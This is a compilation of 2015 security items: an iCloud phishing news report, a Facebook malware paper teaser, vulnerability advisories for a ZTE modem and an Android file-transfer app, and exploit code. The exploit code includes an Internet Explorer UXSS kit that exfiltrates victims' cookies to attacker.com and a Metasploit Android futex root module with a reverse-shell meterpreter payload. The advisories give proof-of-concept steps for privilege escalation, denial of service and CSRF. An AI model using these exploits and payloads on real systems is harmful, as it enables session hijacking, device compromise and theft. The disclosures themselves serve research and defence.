Hackers are targeting Apple iCloud users with phishing messages designed to steal financial information. Sophos employee Paul Ducklin reported in a blog post that the messages are tailored to look like legitimate security alerts. 'Your account may have been compromised. Please cancel the following Order Number: WZEYMHCQVWZ20,' reads the bogus message. 'Within Apple Inc. latest security checks, we recently discovered that today there were incorrect login attempts to your account. For your account status to get back to normal, Go Here >> to complete the details.' The links in the message go to a page owned by the criminals, which requests the filling in of a 'cancellation form'. "The bogus payment cancellation form is hosted on what looks like a hacked home-user DSL connection in Canada," explained Ducklin. "The data submission form goes to a similar ‘server' hosted on a connection via a boutique ISP in Switzerland." Ducklin recommended a variety of protective measures to defend against phishing attacks of this kind. "Don't assume that crooks aren't interested in you. You may have the smallest, simplest web server in the world, but if there's a security hole, the crooks can use your server, and your URLs, as a staging post for their cyber crimes," he said. "Use two-factor authentication if you can. This relies on one-time log-in codes, so the crooks can't simply phish your password and use it over and over." Ducklin is one of many security professionals to call for wider use of two-factor authentication. Attackers are believed to have taken advantage of a lack of two-factor authentication to guess celebrities' iCloud passwords during a wave of high-profile incidents in 2014. Source

Section 1: Introduction 1.1 Overview Lately, a new malware has been seen spreading on Facebook.Facebook is an online social networking service which had over 1.3 billion active users as of June 2014. At that moment, three different variations and spreading methods have been observed. According to the samples that have been acquired,there are three quick campaigns that had been launched. There are some similarities on the way the malware achieves that huge amount of infected victims with a combination of pre-registered domains in the role of C&C server. 1.2 Background ? close friend of mine, who specialize in social media marketing and management, called me late at night requesting my help. He was terrified about the fact that most of his friend on Facebook platform, have been posting status with strange links.Having really a strong interest in malware researching, I decided with a friend to fully understand the process of infection and spreading. Read more: http://dl.packetstormsecurity.net/papers/general/facebook_malware.pdf

Cookie hijacking: Internet Explorer UXSS (CVE-2015-0072) Host below files on webserver (attacker.com) and share the exploit link with victims, exploit.php --- exploit link (Share with victim) redirect.php --- Script to redirect on target page (target page should not contain X-Frame-Options or it will fail) delay.php --- Script to add delay collector.php --- Script to collect hijacked cookie log.txt --- Collected cookies will be stored in this text file -------------------------------------exploit.php----------------------------------- <iframe src="redirect.php" style="display:none"></iframe> <iframe src="https://target.com/" style="display:none"></iframe> <script> top[0].eval('_=top[1];with(new XMLHttpRequest)open("get","http://attacker.com/delay.php",false),send();_.location="javascript:bkp=\'http://attacker.com/collector.php?\'+document.cookie;alert(bkp);window.location(bkp);"'); </script> -------------------------------------------------------------------------------------- -------------------------------------redirect.php----------------------------------- <?php header("Location: https://target.com/"); exit(); ?> -------------------------------------------------------------------------------------- -------------------------------------delay.php----------------------------------- <?php sleep(15); echo 'Bhdresh'; exit(); ?> -------------------------------------------------------------------------------------- -------------------------------------collector.php----------------------------------- <?php $f = fopen("log.txt", 'a'); fwrite($f, $_SERVER["REQUEST_URI"]."\n"); fclose($f); header("Location: http://www.youtube.com/"); ?> -------------------------------------------------------------------------------------- -------------------------------------log.txt----------------------------------- - Create a file as log.txt and modify the permissions (chmod 777 log.txt) -------------------------------------------------------------------------------------- Demo: facabook.net16.net/exploit.php Reference: http://innerht.ml/blog/ie-uxss.html Source

Document Title: =============== ZTE Datacard Telecom MF626 Modem (PCW_TNZNZLV1.0.0B02) - Multiple Vulnerabilities Release Date: ============= 2015-02-09 References (Source): ==================== http://zero-way.net/forum/forum/pentration-testing/exploits/locals/235-zte-datacard-telecom-mf626-modem-pcw_tnznzlv1-0-0b02-multiple-vulnerabilities Product & Service Introduction: =============================== http://www.zte.com.cn http://www.zte.co.nz/main/Product_Downloads/MF626_downloads.htm Affected Product(s): ==================== ZTE Corporation Product: ZTE Datacard Telecom MF626 Modem (PCW_TNZNZLV1.0.0B02) Exploitation Technique: ======================= Local Severity Level: =============== High Technical Details & Description: ================================ A local privilege escalation vulnerability has been discovered in the official ZTE Datacard Telecom MF626 Modem (PCW_TNZNZLV1.0.0B02) application software. The local security vulnerability allows an attackers to gain higher access privileges by exploitation of a insecure permission misconfiguration. The software suffers from a local privilege escalation vulnerability. Users are able to change the file with executable access to a binary of choice. The issue is located in the misconfigured permissions values with the `F`(full) flag in the users and everyone group. The permissions are set to all the binary files of the software in the same location. The files are installed in the `Ucell Internet` directory. The group/user permission for the path is assigned to the everyone group. The full path with the permission misconfiguration allows local low privileged system user accounts to exploit the vulnerability to gain higher access privileges. After the attacker replaced the binary file with the malicious code he can reboot the system to gain higher access privileges. At the end the attacker is able to fully compromises the system by local exploitation. T The third discovered vulnerability is a denial of service bug that affects the local process. Local attackers are able to manipulate the networkCfg.xml to crash the application with a runtime error that results in a unhandled exception. Proof of Concept (PoC): ======================= The vulnerabilities can be exploited by local attackers with restricted account privileges and without user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. --- PoC Session Logs Local Privilege Escalation --- C:\Users\s-dz\Desktop>accesschk.exe -dqv "C:\Program Files\Telecom Connection Manager" C:\Program Files\Telecom Connection Manager Medium Mandatory Level (Default) [No-Write-Up] RW Tout le monde FILE_ALL_ACCESS RW NT SERVICE\TrustedInstaller FILE_ALL_ACCESS RW AUTORITE NT\SystÞme FILE_ALL_ACCESS RW BUILTIN\Administrateurs FILE_ALL_ACCESS R BUILTIN\Utilisateurs FILE_LIST_DIRECTORY FILE_READ_ATTRIBUTES FILE_READ_EA FILE_TRAVERSE SYNCHRONIZE READ_CONTROL C:\Users\s-dz\Desktop> C:\Users\s-dz\Desktop>icacls "C:\Program Files\Telecom Connection Manager" C:\Program Files\Telecom Connection Manager Tout le monde:(F) Tout le monde:(OI)(CI)(IO)(F) NT SERVICE\TrustedInstaller:(I)(F) NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F) AUTORITE NT\Système:(I)(F) AUTORITE NT\Système:(I)(OI)(CI)(IO)(F) BUILTIN\Administrateurs:(I)(F) BUILTIN\Administrateurs:(I)(OI)(CI)(IO)(F) BUILTIN\Utilisateurs:(I)(RX) BUILTIN\Utilisateurs:(I)(OI)(CI)(IO)(GR,GE) CREATEUR PROPRIETAIRE:(I)(OI)(CI)(IO)(F) 1 fichiers correctement traités ; échec du traitement de 0 fichiers C:\Users\s-dz\Desktop> --- PoC Local DoS --- first go to C:\program files\Internet Mobile\networkCfg.xml (Network configuration) and write "A" * 3000 in <ConfigFileName>"A" x 3000</ConfigFileName> . Save it open the program . poc will crash ... Credits & Authors: ================== Hadji Samir s-dz@hotmail.fr Source

Document Title: =============== Wireless File Transfer Pro 1.0.1 - (Android) CSRF Remote Command Execution (Creat, Delete) Release Date: ============= 2015-02-10 Product & Service Introduction: =============================== Wireless File Transfer Pro is the advanced version of Wireless File Transfer. (Copy of the Vendor Homepage: https://play.google.com/store/apps/details?id=com.lextel.WirelessFileTransferPro ) Affected Product(s): ==================== Wireless File Transfer Pro 5.9.5 - (Android) Web Application 1.0.1 Lextel Technology Exploitation Technique: ======================= Remote Severity Level: =============== Medium Request Method(s): [+] [GET] Vulnerable Module(s): [+] browse Vulnerable Parameter(s): [+] fileExplorer.html? Affected Module(s): [+] Index of Documents (http://localhost:8888) Technical Details & Description: ================================ cross site request forgery has been discovered in the Wireless File Transfer Pro 1.0.1 Android mobile web-application. The mobile web-application is vulnerable to a combination of cross site request forgery and local command injection attacks. Proof of Concept (PoC): ======================= Creat New Folder <img src="http://192.168.1.2:8888/fileExplorer.html?action=create&type=folder&folderName=test1" width="0" height="0" border="0"> --- PoC Session Logs [GET] (Execution) --- GET /fileExplorer.html?action=create&type=folder&folderName=test1 HTTP/1.1 Host: 192.168.1.2:8888 User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://192.168.1.2:8888/fileExplorer.html?action=brower&path=/sdcard Connection: keep-alive HTTP/1.1 200 OK Cache-control: no-cache Content-length: 4 <a href="#" onclick="actionBrower('/sdcard/test1')">test1</a></td></td><td width="24%"></td><td width="24%">2015-02-09 18:12:19</td><td width="15%"> Delete File, Folder <img src="http://192.168.1.2:8888/fileExplorer.html?action=deleteFile&fileName=test""width="0" height="0" border="0"> --- PoC Session Logs [GET] (Execution) --- GET /fileExplorer.html?action=deleteFile&fileName=test HTTP/1.1 Host: 192.168.1.2:8888 User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://192.168.1.2:8888/fileExplorer.html?action=brower&path=/sdcard Connection: keep-alive HTTP/1.1 200 OK Cache-control: no-cache Content-length: 30 Reference: http://localhost:8888/ Security Risk: ============== The security risk of the cross site request forgery issue and command injection vulnerability is estimated as medium. (CVSS 4.4) Credits & Authors: ================== Hadji Samir s-dz@hotmail.fr Source

## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' require 'rex' class Metasploit4 < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::File include Msf::Post::Common def initialize(info={}) super( update_info( info, { 'Name' => 'Android futex requeue kernel exploit', 'Description' => %q{ This module exploits a bug in futex_requeue in the linux kernel. Any android phone with a kernel built before June 2014 should be vulnerable. }, 'License' => MSF_LICENSE, 'Author' => [ 'Pinkie Pie', #discovery 'geohot', #towelroot 'timwr' #metasploit module ], 'References' => [ [ 'CVE', '2014-3153' ], [ 'URL', 'http://tinyhack.com/2014/07/07/exploiting-the-futex-bug-and-uncovering-towelroot/' ], [ 'URL', 'http://blog.nativeflow.com/the-futex-vulnerability' ], ], 'SessionTypes' => [ 'meterpreter' ], 'Platform' => 'android', 'Targets' => [[ 'Automatic', { }]], 'Arch' => ARCH_DALVIK, 'DefaultOptions' => { 'PAYLOAD' => 'android/meterpreter/reverse_tcp', }, 'DefaultTarget' => 0 } )) register_options([ OptString.new("WritableDir", [ true, "Temporary directory to write files", "/data/local/tmp/" ]), ], self.class) end def put_local_file(remotefile) localfile = File.join( Msf::Config.data_directory, "exploits", "CVE-2014-3153.elf" ) data = File.read(localfile, {:mode => 'rb'}) write_file(remotefile, data) end def exploit workingdir = session.fs.dir.getwd exploitfile = "#{workingdir}/#{Rex::Text::rand_text_alpha_lower(5)}" payloadfile = "#{workingdir}/#{Rex::Text::rand_text_alpha_lower(5)}" put_local_file(exploitfile) cmd_exec('/system/bin/chmod 700 ' + exploitfile) write_file(payloadfile, payload.raw) tmpdir = datastore['WritableDir'] rootclassdir = "#{tmpdir}#{Rex::Text::rand_text_alpha_lower(5)}" rootpayload = "#{tmpdir}#{Rex::Text::rand_text_alpha_lower(5)}.jar" rootcmd = " mkdir #{rootclassdir} && " rootcmd += "cd #{rootclassdir} && " rootcmd += "cp " + payloadfile + " #{rootpayload} && " rootcmd += "chmod 766 #{rootpayload} && " rootcmd += "dalvikvm -Xbootclasspath:/system/framework/core.jar -cp #{rootpayload} com.metasploit.stage.Payload" process = session.sys.process.execute(exploitfile, rootcmd, {'Hidden' => true, 'Channelized' => true}) process.channel.read end end Source